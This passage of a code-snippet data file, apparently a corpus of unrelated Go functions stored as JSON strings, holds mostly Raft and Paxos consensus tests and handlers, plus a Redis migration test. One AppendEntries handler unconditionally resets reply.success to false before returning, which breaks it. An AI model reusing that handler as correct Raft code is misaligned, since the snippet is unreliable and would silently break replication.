utils.SetOf(\"alice\"),\n\t\t\t\t},\n\t\t\t},\n\t\t}},\n\t})\n\tdefer rt2.Close()\n\n\t// Create first batch of docs\n\tdocIDPrefix := t.Name() + \"rt2doc\"\n\tfor i := 0; i < numRT2DocsInitial; i++ {\n\t\tresp := rt2.SendAdminRequest(http.MethodPut, fmt.Sprintf(\"/db/%s%d\", docIDPrefix, i), `{\"source\":\"rt2\",\"channels\":[\"alice\"]}`)\n\t\tassertStatus(t, resp, http.StatusCreated)\n\t}\n\n\t// Make rt2 listen on an actual HTTP port, so it can receive the blipsync request from rt1\n\tsrv := httptest.NewServer(rt2.TestPublicHandler())\n\tdefer srv.Close()\n\n\t// Build passiveDBURL with basic auth creds\n\tpassiveDBURL, err := url.Parse(srv.URL + \"/db\")\n\trequire.NoError(t, err)\n\tpassiveDBURL.User = url.UserPassword(\"alice\", \"pass\")\n\n\t// Active\n\ttb1 := base.GetTestBucket(t)\n\trt1 := NewRestTester(t, &RestTesterConfig{\n\t\tTestBucket: tb1,\n\t})\n\tdefer rt1.Close()\n\n\tarConfig := db.ActiveReplicatorConfig{\n\t\tID: t.Name(),\n\t\tDirection: db.ActiveReplicatorTypePull,\n\t\tRemoteDBURL: passiveDBURL,\n\t\tActiveDB: &db.Database{\n\t\t\tDatabaseContext: rt1.GetDatabase(),\n\t\t},\n\t\tContinuous: true,\n\t\tChangesBatchSize: changesBatchSize,\n\t\tReplicationStatsMap: base.SyncGatewayStats.NewDBStats(t.Name(), false, false, false).DBReplicatorStats(t.Name()),\n\t}\n\n\t// Create the first active replicator to pull from seq:0\n\tar := db.NewActiveReplicator(&arConfig)\n\n\tstartNumChangesRequestedFromZeroTotal := rt2.GetDatabase().DbStats.CBLReplicationPull().NumPullReplSinceZero.Value()\n\tstartNumRevsSentTotal := rt2.GetDatabase().DbStats.CBLReplicationPull().RevSendCount.Value()\n\n\tassert.NoError(t, ar.Start())\n\n\t// wait for all of the documents originally written to rt2 to arrive at rt1\n\tchangesResults, err := rt1.WaitForChanges(numRT2DocsInitial, \"/db/_changes?since=0\", \"\", true)\n\trequire.NoError(t, err)\n\trequire.Len(t, changesResults.Results, numRT2DocsInitial)\n\tdocIDsSeen := make(map[string]bool, numRT2DocsInitial)\n\tfor _, result := range changesResults.Results {\n\t\tdocIDsSeen[result.ID] = true\n\t}\n\tfor i := 0; i < numRT2DocsInitial; i++ {\n\t\tdocID := fmt.Sprintf(\"%s%d\", docIDPrefix, i)\n\t\tassert.True(t, docIDsSeen[docID])\n\n\t\tdoc, err := rt1.GetDatabase().GetDocument(logger.TestCtx(t), docID, db.DocUnmarshalAll)\n\t\tassert.NoError(t, err)\n\n\t\tbody, err := doc.GetDeepMutableBody()\n\t\trequire.NoError(t, err)\n\t\tassert.Equal(t, \"rt2\", body[\"source\"])\n\t}\n\n\t// one _changes from seq:0 with initial number of docs sent\n\tnumChangesRequestedFromZeroTotal := rt2.GetDatabase().DbStats.CBLReplicationPull().NumPullReplSinceZero.Value()\n\tassert.Equal(t, startNumChangesRequestedFromZeroTotal+1, numChangesRequestedFromZeroTotal)\n\n\t// rev assertions\n\tnumRevsSentTotal := rt2.GetDatabase().DbStats.CBLReplicationPull().RevSendCount.Value()\n\tassert.Equal(t, startNumRevsSentTotal+numRT2DocsInitial, numRevsSentTotal)\n\tassert.Equal(t, int64(numRT2DocsInitial), ar.Pull.Checkpointer.Stats().ProcessedSequenceCount)\n\tassert.Equal(t, int64(numRT2DocsInitial), ar.Pull.Checkpointer.Stats().ExpectedSequenceCount)\n\n\t// checkpoint assertions\n\tassert.Equal(t, int64(0), ar.Pull.Checkpointer.Stats().GetCheckpointHitCount)\n\tassert.Equal(t, int64(1), ar.Pull.Checkpointer.Stats().GetCheckpointMissCount)\n\t// Since we bumped the checkpointer interval, we're only setting checkpoints on replicator close.\n\tassert.Equal(t, int64(0), ar.Pull.Checkpointer.Stats().SetCheckpointCount)\n\tar.Pull.Checkpointer.CheckpointNow()\n\tassert.Equal(t, int64(1), ar.Pull.Checkpointer.Stats().SetCheckpointCount)\n\n\tassert.NoError(t, ar.Stop())\n\n\t// Second batch of docs\n\tfor i := numRT2DocsInitial; i < numRT2DocsTotal; i++ {\n\t\tresp := rt2.SendAdminRequest(http.MethodPut, fmt.Sprintf(\"/db/%s%d\", docIDPrefix, i), `{\"source\":\"rt2\",\"channels\":[\"alice\"]}`)\n\t\tassertStatus(t, resp, http.StatusCreated)\n\t}\n\n\t// Create a new replicator using the same config, which should use the checkpoint set from the first.\n\tar = db.NewActiveReplicator(&arConfig)\n\tdefer func() { assert.NoError(t, ar.Stop()) }()\n\tassert.NoError(t, ar.Start())\n\n\t// wait for all of the documents originally written to rt2 to arrive at rt1\n\tchangesResults, err = rt1.WaitForChanges(numRT2DocsTotal, \"/db/_changes?since=0\", \"\", true)\n\trequire.NoError(t, err)\n\trequire.Len(t, changesResults.Results, numRT2DocsTotal)\n\n\tdocIDsSeen = make(map[string]bool, numRT2DocsTotal)\n\tfor _, result := range changesResults.Results {\n\t\tdocIDsSeen[result.ID] = true\n\t}\n\n\tfor i := 0; i < numRT2DocsTotal; i++ {\n\t\tdocID := fmt.Sprintf(\"%s%d\", docIDPrefix, i)\n\t\tassert.True(t, docIDsSeen[docID])\n\n\t\tdoc, err := rt1.GetDatabase().GetDocument(logger.TestCtx(t), docID, db.DocUnmarshalAll)\n\t\tassert.NoError(t, err)\n\n\t\tbody, err := doc.GetDeepMutableBody()\n\t\trequire.NoError(t, err)\n\t\tassert.Equal(t, \"rt2\", body[\"source\"])\n\t}\n\n\t// Make sure we've not started any more since:0 replications on rt2 since the first one\n\tendNumChangesRequestedFromZeroTotal := rt2.GetDatabase().DbStats.CBLReplicationPull().NumPullReplSinceZero.Value()\n\tassert.Equal(t, numChangesRequestedFromZeroTotal, endNumChangesRequestedFromZeroTotal)\n\n\t// make sure rt2 thinks it has sent all of the revs via a 2.x replicator\n\tnumRevsSentTotal = rt2.GetDatabase().DbStats.CBLReplicationPull().RevSendCount.Value()\n\tassert.Equal(t, startNumRevsSentTotal+numRT2DocsTotal, numRevsSentTotal)\n\tassert.Equal(t, int64(numRT2DocsTotal-numRT2DocsInitial), ar.Pull.Checkpointer.Stats().ProcessedSequenceCount)\n\tassert.Equal(t, int64(numRT2DocsTotal-numRT2DocsInitial), ar.Pull.Checkpointer.Stats().ExpectedSequenceCount)\n\n\t// assert the second active replicator stats\n\tassert.Equal(t, int64(1), ar.Pull.Checkpointer.Stats().GetCheckpointHitCount)\n\tassert.Equal(t, int64(0), ar.Pull.Checkpointer.Stats().GetCheckpointMissCount)\n\tassert.Equal(t, int64(0), ar.Pull.Checkpointer.Stats().SetCheckpointCount)\n\tar.Pull.Checkpointer.CheckpointNow()\n\tassert.Equal(t, int64(1), ar.Pull.Checkpointer.Stats().SetCheckpointCount)\n}", "func TestLeaderFailure(t *testing.T){\r\n\tif !TESTLEADERFAILURE{\r\n\t\treturn\r\n\t}\r\n rafts,_ := makeRafts(5, \"input_spec.json\", \"log\", 200, 300)\t\r\n\ttime.Sleep(2*time.Second)\t\t\t\r\n\trunning := make(map[int]bool)\r\n\tfor i:=1;i<=5;i++{\r\n\t\trunning[i] = true\r\n\t}\r\n\trafts[0].smLock.RLock()\r\n\tlid := rafts[0].LeaderId()\r\n\trafts[0].smLock.RUnlock()\r\n\tdebugRaftTest(fmt.Sprintf(\"leader Id:%v\\n\", lid))\r\n\tif lid != -1{\r\n\t\trafts[lid-1].Shutdown()\r\n\t\tdebugRaftTest(fmt.Sprintf(\"Leader(id:%v) is down, now\\n\", lid))\r\n\t\ttime.Sleep(4*time.Second)\t\t\t\r\n\t\trunning[lid] = false\r\n\t\tfor i := 1; i<= 5;i++{\r\n\t\t\tif running[i] {\r\n\t\t\t\trafts[i-1].Append([]byte(\"first\"))\r\n\t\t\t\tbreak\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\ttime.Sleep(5*time.Second)\t\t\t\r\n\r\n\tfor idx, node := range rafts {\r\n\t\tnode.smLock.RLock()\r\n\t\tdebugRaftTest(fmt.Sprintf(\"%v\", node.sm.String()))\r\n\t\tnode.smLock.RUnlock()\r\n\t\tif running[idx-1]{\r\n\t\t\tnode.Shutdown()\r\n\t\t}\r\n\t}\r\n}", "func (r *Raft) becomeLeader() {\n\t// Your Code Here (2A).\n\t// NOTE: Leader should propose a noop entry on its term\n\tif _, ok := r.Prs[r.id]; !ok {\n\t\treturn\n\t}\n\tlog.DInfo(\"r %d becomes the leader in term %d\", r.id, r.Term)\n\tr.State = StateLeader\n\tr.Lead = r.id\n\tr.Vote = r.id\n\tr.heartbeatElapsed = 0\n\tr.electionElapsed = 0\n\tr.actualElectionTimeout = rand.Intn(r.electionTimeout) + r.electionTimeout\n\t// 成为 leader 以后要重新设置日志同步信息,注意自己的日志同步信息应该一直是最新的,否则会影响 commit 计算\n\tfor k := range r.Prs {\n\t\tif k == r.id { // 不可以超出 peers 的范围\n\t\t\tr.Prs[r.id] = &Progress{\n\t\t\t\tMatch: r.RaftLog.LastIndex(),\n\t\t\t\tNext: r.RaftLog.LastIndex() + 1,\n\t\t\t}\n\t\t} else {\n\t\t\tr.Prs[k] = &Progress{\n\t\t\t\tMatch: 0,\n\t\t\t\tNext: r.RaftLog.LastIndex() + 1,\n\t\t\t}\n\t\t}\n\t}\n\t// raft 要求 leader 不能提交之前任期的日志条目,或者说,提交的日志条目必须包含自己的任期\n\t// 为了在本任期没有收到同步请求的情况下也要能提交之前的日志,应当在成为 leader 的时候立刻 propose 一个空条目并 append 下去\n\t_ = r.Step(pb.Message{\n\t\tMsgType: pb.MessageType_MsgPropose,\n\t\tTo: r.id,\n\t\tFrom: r.id,\n\t\tTerm: r.Term,\n\t\tEntries: []*pb.Entry{{\n\t\t\tEntryType: pb.EntryType_EntryNormal,\n\t\t\tTerm: 0,\n\t\t\tIndex: 0,\n\t\t\tData: nil,\n\t\t}},\n\t})\n}", "func (node *Node) AppendEntries(args AppendEntriesArgs, reply *AppendEntriesReply) error {\n\tnode.mu.Lock()\n\tdefer node.mu.Unlock()\n\n\tif node.state == dead {\n\t\treturn nil\n\t}\n\n\tlog.Printf(\"AppendEntries args: %+v\\ncurrentTerm=%d\\n\", args, node.currentTerm)\n\t// If the AppendEntries RPC is from a higher term then both followers and\n\t// candidates need to be reset.\n\tif args.term > node.currentTerm {\n\t\tnode.updateStateToFollower(args.term)\n\t}\n\n\tif args.term == node.currentTerm {\n\t\tif node.state != follower {\n\t\t\tnode.updateStateToFollower(args.term)\n\t\t}\n\t\t// Reset election timer since we have received a heartbeat from the leader.\n\t\tnode.timeSinceTillLastReset = time.Now()\n\n\t\t// Compare prevLogIndex and prevLogTerm with our own log.\n\t\tif args.prevLogIndex == -1 || (args.prevLogIndex < len(node.log) && args.prevLogTerm == node.log[args.prevLogIndex].term) {\n\t\t\treply.success = true\n\n\t\t\t// Find an existing entry that conflicts with the leader sent entries, and remove everything from it till the end.\n\t\t\tnodeLogIndex := args.prevLogIndex + 1\n\t\t\tleaderLogIndex := 0\n\t\t\tfor {\n\t\t\t\tif nodeLogIndex >= len(node.log) {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\n\t\t\t\tif leaderLogIndex >= len(args.entries) {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\n\t\t\t\t// Found a mismatch so we need to overwrite from this index onwards.\n\t\t\t\tif args.entries[leaderLogIndex].term != node.log[nodeLogIndex].term {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\n\t\t\t\tnodeLogIndex++\n\t\t\t\tleaderLogIndex++\n\t\t\t}\n\n\t\t\t// There are still some log entries which the leader needs to inform us about.\n\t\t\tif leaderLogIndex < len(args.entries) {\n\t\t\t\tlog.Printf(\"The node %d has an old log %+v\", node.id, node.log)\n\t\t\t\tnode.log = append(node.log[:nodeLogIndex], args.entries[leaderLogIndex:]...)\n\t\t\t\tlog.Printf(\"The node %d has a new log %+v\", node.id, node.log)\n\t\t\t}\n\n\t\t\tif args.leaderCommit > node.commitIndex {\n\t\t\t\tnode.commitIndex = intMin(args.leaderCommit, len(node.log)-1)\n\t\t\t\tlog.Printf(\"The commit index node %d has been changed to %d\", node.id, node.commitIndex)\n\t\t\t\t// Indicate to the client that this follower has committed new entries.\n\t\t\t}\n\t\t}\n\n\t\treply.success = true\n\t}\n\treply.term = node.currentTerm\n\t// By default but for readabilty.\n\treply.success = false\n\tlog.Printf(\"AppendEntries reply: %+v\", reply)\n\treturn nil\n}", "func TestCannotCommitWithoutNewTermEntry(t *testing.T) {\n\ttt := newNetwork(nil, nil, nil, nil, nil)\n\tdefer tt.closeAll()\n\ttt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\t// 0 cannot reach 2,3,4\n\ttt.cut(1, 3)\n\ttt.cut(1, 4)\n\ttt.cut(1, 5)\n\n\ttt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\ttt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\n\tsm := tt.peers[1].(*raft)\n\tif sm.raftLog.committed != 1 {\n\t\tt.Errorf(\"committed = %d, want %d\", sm.raftLog.committed, 1)\n\t}\n\n\t// network recovery\n\ttt.recover()\n\t// avoid committing ChangeTerm proposal\n\ttt.ignore(pb.MsgApp)\n\n\t// elect 2 as the new leader with term 2\n\ttt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\n\t// no log entries from previous term should be committed\n\tsm = tt.peers[2].(*raft)\n\tif sm.raftLog.committed != 1 {\n\t\tt.Errorf(\"committed = %d, want %d\", sm.raftLog.committed, 1)\n\t}\n\n\ttt.recover()\n\t// send heartbeat; reset wait\n\ttt.send(pb.Message{From: 2, To: 2, Type: pb.MsgBeat})\n\t// append an entry at current term\n\ttt.send(pb.Message{From: 2, To: 2, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\t// expect the committed to be advanced\n\tif sm.raftLog.committed != 5 {\n\t\tt.Errorf(\"committed = %d, want %d\", sm.raftLog.committed, 5)\n\t}\n}", "func TestLMigrate(t *testing.T) {\n\tvar m = newMigrator()\n\n\tm.flushdst = true\n\tm.flushsrc = true\n\n\t// Just use a separate database on the single redis instance.\n\tm.dstdb = 1\n\tm.initRedis()\n\n\ttestkey := \"list1\"\n\ttestLength := 40\n\tfor i := 0; i < testLength; i++ {\n\t\terr := sclient.RPush(testkey, fmt.Sprintf(\"value-%d\", i)).Err()\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t}\n\tcmdKey = testkey\n\tvar wg sync.WaitGroup\n\tvar lm = &lmigrator{key: cmdKey}\n\tlcount = 7\n\n\tlm.migrate(&wg, dummyProgressPool)\n\n\tlogger.Debugf(\"Migrated test list...%v\", dclient.LLen(testkey).Val())\n\n\tassert.Equal(t, int64(testLength), dclient.LLen(testkey).Val())\n\tlogger.Debug(\"Indexing through all values...\")\n\tfor i := 0; i < testLength; i++ {\n\t\tget := dclient.LIndex(testkey, int64(i))\n\t\tval, err := get.Result()\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\n\t\tassert.Equal(t, fmt.Sprintf(\"value-%d\", i), val)\n\t}\n\n\tsclient.FlushAll()\n\tdclient.FlushAll()\n}", "func TestRaftAddOneNode(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tclusterPrefix := \"TestRaftAddOneNode\"\n\n\t// Create n1 node.\n\tfsm1 := newTestFSM(ID1)\n\tn1 := testCreateRaftNode(getTestConfig(ID1, clusterPrefix+ID1), newStorage())\n\n\t// Create n2 node.\n\tfsm2 := newTestFSM(ID2)\n\tn2 := testCreateRaftNode(getTestConfig(ID2, clusterPrefix+ID2), newStorage())\n\tconnectAllNodes(n1, n2)\n\n\t// The cluster starts with only one node -- n1.\n\tn1.Start(fsm1)\n\tn1.ProposeInitialMembership([]string{ID1})\n\n\t// Wait it to be elected as leader.\n\t<-fsm1.leaderCh\n\n\t// Propose two commands to the cluster. Now the cluster only contains node n1.\n\tn1.Propose([]byte(\"data1\"))\n\tpending := n1.Propose([]byte(\"data2\"))\n\t<-pending.Done\n\n\t// Add node n2 to the cluster.\n\tpending = n1.AddNode(ID2)\n\n\t// The reconfiguration will be blocked until n2 starts. Because the\n\t// new configuration needs to be committed in new quorum\n\tselect {\n\tcase <-pending.Done:\n\t\t// The node might step down, in that case 'ErrNotLeaderAnymore' will be\n\t\t// returned.\n\t\tif pending.Err == nil {\n\t\t\tt.Fatalf(\"the proposed command should fail as the cluster doesn't have a quorum\")\n\t\t}\n\tcase <-time.After(10 * time.Millisecond):\n\t}\n\n\t// Start n2 as a joiner.\n\tn2.Start(fsm2)\n\n\t// Two FSMs should apply all 2 commands, eventually.\n\tif !testEntriesEqual(fsm1.appliedCh, fsm2.appliedCh, 2) {\n\t\tt.Fatal(\"two FSMs in same group applied different sequence of commands.\")\n\t}\n}", "func TestStartDoesNotUpdateReplicationDataForTabletInWrongShard(t *testing.T) {\n\tctx, cancel := context.WithCancel(context.Background())\n\tdefer cancel()\n\tts := memorytopo.NewServer(ctx, \"cell1\", \"cell2\")\n\ttm := newTestTM(t, ts, 1, \"ks\", \"0\")\n\ttm.Stop()\n\n\ttabletAliases, err := ts.FindAllTabletAliasesInShard(ctx, \"ks\", \"0\")\n\trequire.NoError(t, err)\n\tassert.Equal(t, uint32(1), tabletAliases[0].Uid)\n\n\ttablet := newTestTablet(t, 1, \"ks\", \"-d0\")\n\trequire.NoError(t, err)\n\terr = tm.Start(tablet, 0)\n\tassert.Contains(t, err.Error(), \"existing tablet keyspace and shard ks/0 differ\")\n\n\ttablets, err := ts.FindAllTabletAliasesInShard(ctx, \"ks\", \"-d0\")\n\trequire.NoError(t, err)\n\tassert.Equal(t, 0, len(tablets))\n}", "func handleAppendEntries(s *Sailor, state *storage.State, am *appendMessage, leaderId string) (appendReply, error) {\n\t// Check if the node needs to convert to the follower state\n\tif (s.state != follower && am.Term == s.currentTerm) || am.Term > s.currentTerm {\n\t\ts.becomeFollower(am.Term)\n\t}\n\n\trep := appendReply{Term: s.currentTerm, Success: false}\n\t// Reject the RPC if it has the wrong term\n\tif s.currentTerm > am.Term {\n\t\treturn rep, nil\n\t}\n\ts.timer.Reset(new_time()) // The message is from the leader, reset our election-start clock\n\ts.leaderId = leaderId\n\t// Reject the RPC if the position or the term is wrong\n\tif am.PrevLogIndex != 0 && (len(s.log) <= int(am.PrevLogIndex-1) ||\n\t\t(len(s.log) > 0 && s.log[am.PrevLogIndex-1].Term != am.PrevLogTerm)) {\n\t\treturn rep, nil\n\t}\n\n\trep.Success = true // The RPC is valid and the call will succeed\n\n\trep.PrepLower = am.PrevLogIndex + 1\n\trep.ComLower = s.volatile.commitIndex\n\n\t// Loop over the values we're dropping from our log. If we were the leader when\n\t// the values were proposed, then we reply to the client with a set failed message.\n\t// We know we were the leader if we were counting votes for that log entry.\n\tfor i := am.PrevLogIndex; i < uint(len(s.log)); i++ {\n\t\tif s.log[i].votes != 0 {\n\t\t\tfail := messages.Message{}\n\t\t\tfail.Source = s.client.NodeName\n\t\t\tfail.Type = \"setResponse\"\n\t\t\tfail.Error = \"SET FAILED\"\n\t\t\tfail.ID = s.log[i].Id\n\t\t\tfail.Key = s.log[i].Trans.Key\n\t\t\ts.client.SendToBroker(fail)\n\t\t}\n\t}\n\t// Drops the extra entries and adds the new ones\n\ts.log = append(s.log[:am.PrevLogIndex], am.Entries...)\n\t// If we have new values to commit\n\tif am.LeaderCommit > s.volatile.commitIndex {\n\t\t// Choose the min of our log size and the leader's commit index\n\t\tif int(am.LeaderCommit) <= len(s.log) {\n\t\t\ts.volatile.commitIndex = am.LeaderCommit\n\t\t} else {\n\t\t\ts.volatile.commitIndex = uint(len(s.log))\n\t\t}\n\t\t// Actually commit and apply the transactions to the state machine\n\t\tfor s.volatile.lastApplied < s.volatile.commitIndex {\n\t\t\ts.volatile.lastApplied += 1\n\t\t\tstate.ApplyTransaction(s.log[s.volatile.lastApplied-1].Trans)\n\t\t}\n\n\t}\n\trep.PrepUpper = uint(len(s.log))\n\trep.ComUpper = s.volatile.commitIndex\n\treturn rep, nil\n}", "func TestLeaderElectionInitialMessages(t *testing.T) {\n\tp := newPaxos(&Config{ID: 1, NodeCount: 3})\n\n\tvc := &pb.ViewChange{\n\t\tNodeId: 1,\n\t\tAttemptedView: 1,\n\t}\n\tmvc := &pb.Message_ViewChange{ViewChange: vc}\n\texp := []pb.Message{\n\t\t{To: 0, Type: mvc},\n\t\t{To: 2, Type: mvc},\n\t}\n\tif msgs := p.msgs; !reflect.DeepEqual(msgs, exp) {\n\t\tt.Errorf(\"expected the outbound messages %+v, found %+v\", exp, msgs)\n\t}\n}", "func TestKillLeader(t *testing.T) {\n\tprocAttr := new(os.ProcAttr)\n\tprocAttr.Files = []*os.File{nil, os.Stdout, os.Stderr}\n\n\tclusterSize := 5\n\targGroup, etcds, err := createCluster(clusterSize, procAttr, false)\n\n\tif err != nil {\n\t\tt.Fatal(\"cannot create cluster\")\n\t}\n\n\tdefer destroyCluster(etcds)\n\n\tleaderChan := make(chan string, 1)\n\n\ttime.Sleep(time.Second)\n\n\tgo leaderMonitor(clusterSize, 1, leaderChan)\n\n\tvar totalTime time.Duration\n\n\tleader := \"http://127.0.0.1:7001\"\n\n\tfor i := 0; i < clusterSize; i++ {\n\t\tfmt.Println(\"leader is \", leader)\n\t\tport, _ := strconv.Atoi(strings.Split(leader, \":\")[2])\n\t\tnum := port - 7001\n\t\tfmt.Println(\"kill server \", num)\n\t\tetcds[num].Kill()\n\t\tetcds[num].Release()\n\n\t\tstart := time.Now()\n\t\tfor {\n\t\t\tnewLeader := <-leaderChan\n\t\t\tif newLeader != leader {\n\t\t\t\tleader = newLeader\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\ttake := time.Now().Sub(start)\n\n\t\ttotalTime += take\n\t\tavgTime := totalTime / (time.Duration)(i+1)\n\n\t\tfmt.Println(\"Leader election time is \", take, \"with election timeout\", ElectionTimeout)\n\t\tfmt.Println(\"Leader election time average is\", avgTime, \"with election timeout\", ElectionTimeout)\n\t\tetcds[num], err = os.StartProcess(\"etcd\", argGroup[num], procAttr)\n\t}\n}", "func ExampleLeader() {\n\t// Init server\n\tsrv := redeo.NewServer(nil)\n\n\t// Start raft\n\trft, tsp, err := startRaft(srv)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer rft.Shutdown()\n\tdefer tsp.Close()\n\n\t// Report leader\n\tsrv.Handle(\"raftleader\", redeoraft.Leader(rft))\n\n\t// $ redis-cli -p 9736 raftleader\n\t// \"10.0.0.1:9736\"\n}", "func (node *RaftNode) Connect_raft_node(ctx context.Context, id int, rep_addrs []string, testing bool) {\n\n\t/*\n\t * Connect the new node to the existing nodes.\n\t * Attempt to gRPC dial to other replicas and obtain corresponding client stubs.\n\t * ConnectToPeerReplicas is defined in raft_node.go.\n\t */\n\tlog.Println(\"Obtaining client stubs of gRPC servers running at peer replicas...\")\n\tnode.ConnectToPeerReplicas(ctx, rep_addrs)\n\n\t// Setting up and running the gRPC server\n\tgrpc_address := \":500\" + strconv.Itoa(id)\n\n\ttcpAddr, err := net.ResolveTCPAddr(\"tcp4\", grpc_address)\n\tCheckErrorFatal(err)\n\n\tlistener, err := net.ListenTCP(\"tcp\", tcpAddr)\n\tCheckErrorFatal(err)\n\n\tnode.Meta.grpc_server = grpc.NewServer()\n\n\t/*\n\t * ConsensusService is defined in protos/replica.proto\n\t * RegisterConsensusServiceServer is present in the generated .pb.go file\n\t */\n\tprotos.RegisterConsensusServiceServer(node.Meta.grpc_server, node)\n\n\t// Running the gRPC server\n\tgo node.StartGRPCServer(ctx, grpc_address, listener, testing)\n\n\t// wait till grpc server is up\n\tconnxn, err := grpc.Dial(grpc_address, grpc.WithInsecure())\n\n\t// below block may not be needed\n\tfor err != nil {\n\t\tconnxn, err = grpc.Dial(grpc_address, grpc.WithInsecure())\n\t}\n\n\tfor {\n\n\t\tif connxn.GetState() == connectivity.Ready {\n\t\t\tbreak\n\t\t}\n\n\t\ttime.Sleep(20 * time.Millisecond)\n\n\t}\n\n\t// Now we can start listening to client requests\n\n\t// Set up the server that listens for client requests.\n\tserver_address := \":400\" + strconv.Itoa(id)\n\tlog.Println(\"Starting raft replica server...\")\n\tgo node.StartRaftServer(ctx, server_address, testing)\n\n\ttest_addr := fmt.Sprintf(\"http://localhost%s/test\", server_address)\n\n\t// Check whether the server is active\n\tfor {\n\n\t\t_, err = http.Get(test_addr)\n\n\t\tif err == nil {\n\t\t\tlog.Printf(\"\\nRaft replica server up and listening at port %s\\n\", server_address)\n\t\t\tbreak\n\t\t}\n\n\t}\n\n}", "func TestFollowerCommitEntry(t *testing.T) {\n\ttests := []struct {\n\t\tents []pb.Entry\n\t\tcommit uint64\n\t}{\n\t\t{\n\t\t\t[]pb.Entry{\n\t\t\t\t{Term: 1, Index: 1, Data: []byte(\"some data\")},\n\t\t\t},\n\t\t\t1,\n\t\t},\n\t\t{\n\t\t\t[]pb.Entry{\n\t\t\t\t{Term: 1, Index: 1, Data: []byte(\"some data\")},\n\t\t\t\t{Term: 1, Index: 2, Data: []byte(\"some data2\")},\n\t\t\t},\n\t\t\t2,\n\t\t},\n\t\t{\n\t\t\t[]pb.Entry{\n\t\t\t\t{Term: 1, Index: 1, Data: []byte(\"some data2\")},\n\t\t\t\t{Term: 1, Index: 2, Data: []byte(\"some data\")},\n\t\t\t},\n\t\t\t2,\n\t\t},\n\t\t{\n\t\t\t[]pb.Entry{\n\t\t\t\t{Term: 1, Index: 1, Data: []byte(\"some data\")},\n\t\t\t\t{Term: 1, Index: 2, Data: []byte(\"some data2\")},\n\t\t\t},\n\t\t\t1,\n\t\t},\n\t}\n\tfor i, tt := range tests {\n\t\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.becomeFollower(1, 2)\n\n\t\tr.Step(pb.Message{From: 2, To: 1, Type: pb.MsgApp, Term: 1, Entries: tt.ents, Commit: tt.commit})\n\n\t\tif g := r.raftLog.committed; g != tt.commit {\n\t\t\tt.Errorf(\"#%d: committed = %d, want %d\", i, g, tt.commit)\n\t\t}\n\t\twents := tt.ents[:int(tt.commit)]\n\t\tif g := r.raftLog.nextEnts(); !reflect.DeepEqual(g, wents) {\n\t\t\tt.Errorf(\"#%d: nextEnts = %v, want %v\", i, g, wents)\n\t\t}\n\t}\n}", "func TestClusteringRestartClusterWithSnapshotOfDeletedChannel(t *testing.T) {\n\tcleanupDatastore(t)\n\tdefer cleanupDatastore(t)\n\tcleanupRaftLog(t)\n\tdefer cleanupRaftLog(t)\n\n\trestoreMsgsAttempts = 2\n\trestoreMsgsRcvTimeout = 50 * time.Millisecond\n\trestoreMsgsSleepBetweenAttempts = 0\n\tdefer func() {\n\t\trestoreMsgsAttempts = defaultRestoreMsgsAttempts\n\t\trestoreMsgsRcvTimeout = defaultRestoreMsgsRcvTimeout\n\t\trestoreMsgsSleepBetweenAttempts = defaultRestoreMsgsSleepBetweenAttempts\n\t}()\n\n\t// For this test, use a central NATS server.\n\tns := natsdTest.RunDefaultServer()\n\tdefer ns.Shutdown()\n\n\tmaxInactivity := 250 * time.Millisecond\n\n\t// Configure first server\n\ts1sOpts := getTestDefaultOptsForClustering(\"a\", true)\n\ts1sOpts.Clustering.TrailingLogs = 0\n\ts1sOpts.MaxInactivity = maxInactivity\n\ts1 := runServerWithOpts(t, s1sOpts, nil)\n\tdefer s1.Shutdown()\n\n\t// Configure second server.\n\ts2sOpts := getTestDefaultOptsForClustering(\"b\", false)\n\ts2sOpts.Clustering.TrailingLogs = 0\n\ts2sOpts.MaxInactivity = maxInactivity\n\ts2 := runServerWithOpts(t, s2sOpts, nil)\n\tdefer s2.Shutdown()\n\n\t// Configure third server.\n\ts3sOpts := getTestDefaultOptsForClustering(\"c\", false)\n\ts3sOpts.Clustering.TrailingLogs = 0\n\ts3sOpts.MaxInactivity = maxInactivity\n\ts3 := runServerWithOpts(t, s3sOpts, nil)\n\tdefer s3.Shutdown()\n\n\tservers := []*StanServer{s1, s2, s3}\n\n\t// Wait for leader to be elected.\n\tgetLeader(t, 10*time.Second, servers...)\n\n\t// Create a client connection.\n\tsc, err := stan.Connect(clusterName, clientName)\n\tif err != nil {\n\t\tt.Fatalf(\"Expected to connect correctly, got err %v\", err)\n\t}\n\tdefer sc.Close()\n\n\t// Send a message, which will create the channel\n\tchannel := \"foo\"\n\texpectedMsg := make(map[uint64]msg)\n\texpectedMsg[1] = msg{sequence: 1, data: []byte(\"first\")}\n\texpectedMsg[2] = msg{sequence: 2, data: []byte(\"second\")}\n\texpectedMsg[3] = msg{sequence: 3, data: []byte(\"third\")}\n\tfor i := 1; i < 4; i++ {\n\t\tif err := sc.Publish(channel, expectedMsg[uint64(i)].data); err != nil {\n\t\t\tt.Fatalf(\"Error on publish: %v\", err)\n\t\t}\n\t}\n\tsc.Close()\n\t// Wait for channel to be replicated in all servers\n\tverifyChannelConsistency(t, channel, 5*time.Second, 1, 3, expectedMsg, servers...)\n\n\t// Perform snapshot on all servers.\n\tfor _, s := range servers {\n\t\tif err := s.raft.Snapshot().Error(); err != nil {\n\t\t\tt.Fatalf(\"Error during snapshot: %v\", err)\n\t\t}\n\t}\n\n\t// Wait for channel to be removed due to inactivity..\n\ttime.Sleep(2 * maxInactivity)\n\n\t// Restart all servers\n\tservers = restartServers(t, servers)\n\tdefer shutdownServers(servers)\n\tgetLeader(t, 10*time.Second, 